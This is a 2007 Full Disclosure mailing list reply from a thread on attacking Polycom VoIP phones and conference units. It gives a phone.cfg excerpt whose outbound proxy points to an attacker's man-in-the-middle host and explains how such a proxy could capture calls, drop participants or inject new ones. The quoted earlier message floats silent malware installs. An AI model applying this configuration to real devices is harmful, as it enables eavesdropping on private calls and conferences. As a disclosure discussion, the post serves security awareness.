Full Disclosure mailing list archives

Re: Polycom hacking

From: "J. Oquendo" <sil () infiltrated net>
Date: Tue, 26 Jun 2007 14:52:50 -0400

Paul Schmehl wrote:

Thanks. I'm not that interested in DoSes, but I'm thinking that youcould mget the entire contents, alter them to your satisfaction andthen mput them. Don't know how much memory these things have yet, butyou ought to be able to iframe silent installs of malware, script thecapture of all audio and video traffic from/to the device, etc. Couldbe quite interesting.

On that level you could just use a MITM proxy: phone.cfg (removed htmlbrackets)


xml version="1.0" encoding="UTF-8" standalone="yes"
phone102
 reg
   reg.1.displayName="666"
   reg.1.address="666"
   reg.1.label="666"
   reg.1.type="private"
   reg.1.lcs=""
   reg.1.thirdPartyName=""
   reg.1.auth.userId="666"
   reg.1.auth.password="666"
   reg.1.server.1.address="original.server.ip"
   reg.1.server.1.port="5060"
   reg.1.server.1.transport="UDPonly"
   reg.1.server.1.expires="1800"
   reg.1.server.1.expires.overlap=""
   reg.1.server.1.register="1"
   reg.1.outboundProxy.address="man.in.the.middle.proxy"
   reg.1.outboundProxy.port="5060"
   reg.1.outboundProxy.transport=""
   reg.1.ringType="2"
   reg.1.lineKeys=""
   reg.1.callsPerLineKey=""

//  stripped the rest...

Where reg.1.server.1.address= points back at their PBX/H323
server. The problem with this would lie on the networking
side. Local without VLANs... Not a problem. Remotely, would
take some work but its doable. Polycoms are horrible when
it comes to doing network address translation and many set
them up in dirty DMZ's to get them to work.

Soundstations use the same XML files as the phones do. In sip.cfg:

outboundProxy voIpProt.SIP.outboundProxy.address=""voIpProt.SIP.outboundProxy.port="5060"voIpProt.SIP.outboundProxy.transport="DNSnaptr"


Obvious entries to fill... Would work like this:

Registration and subsequent connection(s):
Soundstation --> AttackerProxy --> RealServer

With AttackerProxy looking at traffic you could recompile data,
block hosts from the conference, inject new participants, etc.

====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743

echo infiltrated.net|sed 's/^/sil@/g'

"Wise men talk because they have something to say;
fools, because they have to say something." -- Plato

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Polycom hacking Paul Schmehl (Jun 26)
- Re: Polycom hacking StaticRez (Jun 26)
- Re: Polycom hacking J. Oquendo (Jun 26)
  - Re: Polycom hacking Paul Schmehl (Jun 26)
    - Re: Polycom hacking J. Oquendo (Jun 26)
- <Possible follow-ups>
- Re: Polycom hacking b . hines (Jun 26)
  - Re: Polycom hacking Paul Schmehl (Jun 26)
- Re: Polycom hacking Paul Schmehl (Jun 27)
  - Re: Polycom hacking Peter Dawson (Jun 28)
    - Re: Polycom hacking Paul Schmehl (Jun 29)